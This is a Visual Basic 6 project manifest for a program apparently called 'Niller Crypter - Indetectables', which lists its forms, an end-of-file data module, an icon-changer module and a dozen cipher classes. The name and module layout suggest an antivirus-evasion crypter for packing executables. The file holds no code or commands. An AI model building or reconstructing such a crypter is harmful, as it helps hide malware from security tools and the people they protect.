Type=Exe
Form=Niller.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Form=Opciones.frm
Object={BD0C1912-66C3-49CC-8B12-7B347BF6C846}#13.0#0; COAABA~1.OCX
Module=EofData; Modulos\EofData.bas
Module=iconchanger; Modulos\IconChanger.bas
Class=clsBoxT; Modulos\clsCheckBoxT.cls
Class=clsCryptAPI; Modulos\clsCryptAPI.cls
Class=clsDES; Modulos\clsDES.cls
Class=clsRC4; Modulos\clsRC4.cls
Class=clsSimpleXOR; Modulos\clsSimpleXOR.cls
Class=clsSkipjack; Modulos\clsSkipjack.cls
Class=clsTEA; Modulos\clsTEA.cls
Class=clsGost; Modulos\clsGost.cls
Module=modHEX; Modulos\modHex.bas
Module=AMethod; Modulos\AMethod.bas
Class=clsTwofish; Modulos\clsTwofish.cls
Class=clsBlowfish; Modulos\clsBlowfish.cls
Module=ArchivoE; Modulos\ArchivoE.bas
Class=clsSerpent; Modulos\clsSerpent.cls
IconForm="Niller"
Startup="Niller"
ExeName32="Niller Crypter - Indetectables.exe"
Path32="..\Niller Crypter (Compilado)"
Command32=""
Name="Indetectables"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="AIV"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
